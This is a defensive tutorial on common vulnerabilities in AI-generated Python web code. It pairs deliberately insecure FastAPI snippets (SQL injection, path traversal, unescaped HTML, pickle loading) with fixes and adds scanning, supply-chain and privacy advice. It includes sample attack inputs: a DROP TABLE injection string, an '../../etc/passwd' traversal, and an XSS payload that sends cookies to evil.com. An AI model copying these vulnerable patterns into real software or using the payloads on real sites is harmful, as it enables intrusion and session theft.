Security in AI-Assisted Coding
Why Security Matters More with AI Code
AI coding assistants generate code by predicting statistically likely patterns from training data. This training data includes millions of repositories — many of which contain insecure code, outdated practices, and even known vulnerabilities.
Studies show that AI-generated code contains security vulnerabilities in approximately 40% of cases when developers don't specify security requirements in their prompts. AI models optimize for functional correctness, not security by default.
Imagine a chef trained by watching every cooking video on the internet — including ones with bad hygiene practices. The chef can make delicious-looking food, but if you don't specifically ask for food safety compliance, they might skip hand-washing. AI code generation works the same way: you must explicitly request secure coding practices.
Common Security Vulnerabilities in AI-Generated Code
1. SQL Injection
AI models frequently generate code that concatenates user input directly into SQL queries instead of using parameterized queries.
❌ Insecure (AI often generates this):
# VULNERABLE: SQL Injection
@app.get("/users")
def search_users(name: str):
query = f"SELECT * FROM users WHERE name = '{name}'"
result = db.execute(query)
return result.fetchall()
# Attack: name = "'; DROP TABLE users; --"
✅ Secure (what you should require):
# SAFE: Parameterized query
@app.get("/users")
def search_users(name: str):
query = text("SELECT * FROM users WHERE name = :name")
result = db.execute(query, {"name": name})
return result.fetchall()
Even better with an ORM:
# SAFE: SQLAlchemy ORM
@app.get("/users")
def search_users(name: str, db: Session = Depends(get_db)):
return db.query(User).filter(User.name == name).all()
SQL injection has been the #1 web application vulnerability for over two decades. AI models, trained on older code, frequently produce injectable queries. Always use parameterized queries or an ORM.
2. Hardcoded Secrets and Credentials
AI models often include placeholder credentials that developers forget to replace:
❌ Insecure:
# VULNERABLE: Hardcoded credentials
DATABASE_URL = "postgresql://admin:password123@db.example.com:5432/production"
API_KEY = "sk-1234567890abcdef"
JWT_SECRET = "super-secret-key"
def get_db():
return create_engine(DATABASE_URL)
✅ Secure:
# SAFE: Environment variables
import os
from dotenv import load_dotenv
load_dotenv()
DATABASE_URL = os.environ["DATABASE_URL"]
API_KEY = os.environ["API_KEY"]
JWT_SECRET = os.environ["JWT_SECRET"]
def get_db():
if not DATABASE_URL:
raise RuntimeError("DATABASE_URL environment variable is not set")
return create_engine(DATABASE_URL)
3. Insecure Deserialization
AI may suggest using pickle to load untrusted data — a critical vulnerability:
❌ Insecure:
import pickle
# VULNERABLE: Loading untrusted pickle data
def load_model(file_path: str):
with open(file_path, "rb") as f:
return pickle.load(f) # Can execute arbitrary code!
✅ Secure:
import joblib
import hashlib
# SAFE: Verify integrity before loading
EXPECTED_HASH = "sha256:a1b2c3d4..."
def load_model(file_path: str):
with open(file_path, "rb") as f:
data = f.read()
file_hash = f"sha256:{hashlib.sha256(data).hexdigest()}"
if file_hash != EXPECTED_HASH:
raise ValueError("Model file integrity check failed")
return joblib.load(file_path)
4. Path Traversal
AI-generated file handling code often doesn't validate paths:
❌ Insecure:
# VULNERABLE: Path traversal
@app.get("/files/{filename}")
def get_file(filename: str):
file_path = f"/uploads/{filename}"
return FileResponse(file_path)
# Attack: filename = "../../etc/passwd"
✅ Secure:
from pathlib import Path
UPLOAD_DIR = Path("/uploads").resolve()
@app.get("/files/{filename}")
def get_file(filename: str):
safe_path = (UPLOAD_DIR / filename).resolve()
if not safe_path.is_relative_to(UPLOAD_DIR):
raise HTTPException(status_code=400, detail="Invalid file path")
if not safe_path.exists():
raise HTTPException(status_code=404, detail="File not found")
return FileResponse(safe_path)
5. Missing Input Validation
AI often generates the "happy path" without validating inputs:
❌ Insecure:
# VULNERABLE: No input validation
@app.post("/transfer")
def transfer_money(data: dict):
from_account = data["from"]
to_account = data["to"]
amount = data["amount"]
db.execute(f"UPDATE accounts SET balance = balance - {amount} WHERE id = {from_account}")
db.execute(f"UPDATE accounts SET balance = balance + {amount} WHERE id = {to_account}")
return {"status": "success"}
✅ Secure:
from pydantic import BaseModel, Field, validator
class TransferRequest(BaseModel):
from_account: int = Field(..., gt=0)
to_account: int = Field(..., gt=0)
amount: float = Field(..., gt=0, le=10000)
@validator("to_account")
def accounts_must_differ(cls, v, values):
if "from_account" in values and v == values["from_account"]:
raise ValueError("Cannot transfer to the same account")
return v
@app.post("/transfer")
def transfer_money(request: TransferRequest, db: Session = Depends(get_db)):
with db.begin():
sender = db.query(Account).filter(Account.id == request.from_account).with_for_update().first()
if not sender or sender.balance < request.amount:
raise HTTPException(status_code=400, detail="Insufficient funds")
sender.balance -= request.amount
receiver = db.query(Account).filter(Account.id == request.to_account).with_for_update().first()
if not receiver:
raise HTTPException(status_code=404, detail="Receiver account not found")
receiver.balance += request.amount
return {"status": "success", "new_balance": sender.balance}
6. Cross-Site Scripting (XSS)
AI may generate web code that doesn't escape user input:
❌ Insecure:
# VULNERABLE: XSS via unescaped HTML
@app.get("/profile/{username}")
def show_profile(username: str):
return HTMLResponse(f"<h1>Welcome, {username}!</h1>")
# Attack: username = "<script>document.location='http://evil.com/steal?c='+document.cookie</script>"
✅ Secure:
from markupsafe import escape
@app.get("/profile/{username}")
def show_profile(username: str):
safe_name = escape(username)
return HTMLResponse(f"<h1>Welcome, {safe_name}!</h1>")
OWASP Top 10 and AI-Generated Code
The OWASP Top 10 is the standard reference for web application security risks. Here's how AI-generated code intersects with each:
| OWASP Risk | AI Relevance | Risk Level |
|---|---|---|
| A01: Broken Access Control | AI rarely generates authorization checks unless asked | 🔴 Critical |
| A02: Cryptographic Failures | AI may use weak algorithms (MD5, SHA1 for passwords) | 🔴 Critical |
| A03: Injection | SQL, NoSQL, command injection from string concatenation | 🔴 Critical |
| A04: Insecure Design | AI generates code, not architecture — missing security design | 🟡 High |
| A05: Security Misconfiguration | Debug mode on, default credentials, verbose errors | 🟡 High |
| A06: Vulnerable Components | AI may suggest outdated or vulnerable packages | 🔴 Critical |
| A07: Auth Failures | Weak password policies, missing rate limiting, session flaws | 🟡 High |
| A08: Data Integrity Failures | Insecure deserialization (pickle), missing integrity checks | 🟡 High |
| A09: Logging Failures | AI often omits logging; may log sensitive data when it does | 🟢 Medium |
| A10: SSRF | AI-generated URL fetching without validation | 🟡 High |
Code Scanning and Security Tools
Never rely solely on manual review. Use automated tools to catch vulnerabilities:
Python-Specific Tools
| Tool | What It Scans | Integration |
|---|---|---|
| Bandit | Python-specific security issues (eval, pickle, SQL) | CLI, CI/CD, pre-commit |
| Safety | Known vulnerabilities in installed packages | CLI, CI/CD |
| pip-audit | Package vulnerability database (PyPI) | CLI, GitHub Actions |
| mypy | Type errors that can lead to security issues | CLI, IDE, CI/CD |
General-Purpose Tools
| Tool | What It Scans | Language Support |
|---|---|---|
| Snyk | Dependencies + code vulnerabilities | Python, JS, Java, Go, ... |
| SonarQube | Code quality + security vulnerabilities | 30+ languages |
| Semgrep | Custom static analysis rules | Python, JS, Go, Java, ... |
| Trivy | Container images + IaC + filesystem | Universal |
| CodeQL | Deep semantic code analysis | Python, JS, Java, C/C++, Go |
Example: Running Bandit on AI-Generated Code
# Install bandit
pip install bandit
# Scan a single file
bandit -r my_ai_generated_code.py
# Scan entire project with medium+ severity
bandit -r ./src -ll
# Generate a report
bandit -r ./src -f json -o security_report.json
Example Bandit output:
>> Issue: [B608:hardcoded_sql_expressions] Possible SQL injection vector
Severity: Medium Confidence: Low
Location: ./api/routes.py:42
More Info: https://bandit.readthedocs.io/en/latest/plugins/b608
41 def search_users(name: str):
42 query = f"SELECT * FROM users WHERE name = '{name}'"
43 result = db.execute(query)
Integrating Security Scanning into Your Workflow
View Security Scanning Pipeline
Supply Chain Attacks
The Risk of AI-Suggested Packages
AI models can suggest packages that:
- Don't exist — attackers can register these names with malicious code ("dependency confusion")
- Are typosquats — similar names to popular packages (e.g.,
reqeustsvsrequests) - Are deprecated — no longer maintained, with known vulnerabilities
- Are compromised — legitimate packages whose maintainer accounts were hacked
How to Verify a Package
Before running pip install on any AI-suggested package:
# 1. Check if it exists and see metadata
pip index versions package-name
# 2. Check on PyPI website
# Visit: https://pypi.org/project/package-name/
# 3. Look at download statistics (should be high for legitimate packages)
# Visit: https://pypistats.org/packages/package-name
# 4. Check the GitHub repository linked from PyPI
# - Does it have stars?
# - When was it last updated?
# - Does the author maintain other known packages?
In December 2022, a malicious package torchtriton was uploaded to PyPI and was installed by anyone who ran pip install pytorch-nightly. The package stole SSH keys, AWS credentials, and other sensitive files. Always verify packages before installing.
Checklist: Before Installing an AI-Suggested Package
- Verify the package exists on PyPI
- Check the download count (major packages have millions of downloads)
- Verify the author/maintainer is credible
- Check when it was last updated (avoid abandoned packages)
- Read the GitHub README and issues
- Check for known vulnerabilities:
pip-auditorsafety check - Compare the exact package name (watch for typosquatting)
- Pin the version in your requirements file
Data Privacy When Using AI Tools
What Data Gets Sent to AI Providers
When you use AI coding tools, your code is sent to external servers for processing:
| Tool | Data Sent | Data Retention | Can Opt Out? |
|---|---|---|---|
| GitHub Copilot | Current file + context | Not used for training (Business) | Yes (Business plan) |
| ChatGPT | Everything you paste | May be used for training (Free) | Yes (opt out in settings) |
| Cursor | Files + project context | Varies by plan and model | Privacy mode available |
| CodeWhisperer | Current file | Not shared (Professional) | Yes |
Never paste the following into AI chat tools:
- API keys, passwords, or tokens
- Customer data or PII (Personally Identifiable Information)
- Proprietary algorithms or trade secrets
- Internal infrastructure details (IPs, hostnames, credentials)
- Data subject to compliance requirements (HIPAA, PCI-DSS, GDPR)
Mitigation Strategies
| Strategy | Description |
|---|---|
| Use enterprise plans | Business plans typically don't train on your code |
| Sanitize before prompting | Replace real secrets with placeholders before pasting |
| Self-hosted models | Run open-source models locally (Ollama + CodeLlama, DeepSeek) |
| Code review policies | Require human review of all AI-generated code |
| DLP tools | Use Data Loss Prevention tools to detect leaked secrets |
How to Sanitize Code Before Prompting
# BEFORE SENDING TO AI (your actual code):
DATABASE_URL = "postgresql://prod_admin:X7$kL9mN@db.mycompany.com:5432/customers"
STRIPE_KEY = "sk_live_4eC39HqLyjWDarjtT1zdp7dc"
# AFTER SANITIZING (what you send to AI):
DATABASE_URL = "postgresql://user:password@hostname:5432/dbname"
STRIPE_KEY = "sk_live_XXXXXXXXXXXXXXXXXXXX"
Intellectual Property Concerns
Key Questions for AI-Generated Code
| Question | Consideration |
|---|---|
| Who owns AI-generated code? | Varies by jurisdiction — generally the developer/company |
| Can AI reproduce copyrighted code? | Yes — AI may reproduce GPL/AGPL code verbatim |
| License contamination? | If AI copies GPL code into your MIT project, you may have a problem |
| Patent risks? | AI may generate code that infringes on software patents |
Best Practices for IP Protection
- Enable code reference detection — GitHub Copilot can flag when suggestions match public code
- Use license-aware tools — Some tools filter out suggestions from copyleft repos
- Document AI usage — Keep records of what was AI-generated for legal clarity
- Review for uniqueness — If a suggestion looks too specific, search for the source
- Follow your organization's AI policy — Many companies have specific guidelines
Secure Coding Checklist for AI-Generated Code
Use this comprehensive checklist every time you integrate AI-generated code:
Authentication & Authorization
- All endpoints require authentication unless explicitly public
- Authorization checks verify the user has permission for the specific resource
- Passwords are hashed with bcrypt/argon2 (not MD5/SHA1)
- JWT tokens have appropriate expiration times
- Rate limiting is applied to auth endpoints
Input Validation
- All user inputs are validated (type, length, format, range)
- SQL queries use parameterized statements or ORM
- File paths are validated against path traversal
- URLs are validated before fetching (SSRF prevention)
- HTML output is escaped to prevent XSS
Data Protection
- No hardcoded credentials, API keys, or secrets
- Sensitive data is encrypted at rest and in transit
- Logs don't contain passwords, tokens, or PII
- Error messages don't leak internal implementation details
- Database connections use TLS/SSL
Dependencies
- All packages exist on PyPI/npm and are legitimate
- Package versions are pinned in requirements files
- No known vulnerabilities (checked with pip-audit/safety)
- No unnecessary dependencies (minimize attack surface)
Error Handling
- Exceptions are caught and handled appropriately
- Generic error messages are returned to users (no stack traces)
- Detailed errors are logged server-side for debugging
- Application doesn't crash on unexpected input
Security-Focused Prompting
To get more secure code from AI, explicitly request security in your prompts:
❌ Insecure prompt:
Write a login endpoint for FastAPI
✅ Security-focused prompt:
Write a secure login endpoint for FastAPI that:
- Uses bcrypt for password verification
- Returns JWT tokens with 15-minute expiry
- Implements rate limiting (5 attempts per minute per IP)
- Returns generic "Invalid credentials" for both wrong email and wrong password
- Logs failed attempts without logging the attempted password
- Uses constant-time comparison for password verification
- Sets secure, HTTP-only cookie flags for the token
Key Takeaways
| Concept | Summary |
|---|---|
| AI security risk | ~40% of AI-generated code contains vulnerabilities when security isn't specified |
| Top vulnerabilities | SQL injection, hardcoded secrets, path traversal, XSS, insecure deserialization |
| OWASP alignment | AI code frequently triggers OWASP Top 10 categories |
| Scanning tools | Bandit, Snyk, SonarQube, Semgrep, pip-audit |
| Supply chain | Verify all AI-suggested packages before installing |
| Data privacy | Never paste secrets, PII, or proprietary code into AI tools |
| IP concerns | AI may reproduce copyrighted code — enable reference detection |
| Secure prompting | Explicitly request security requirements in every prompt |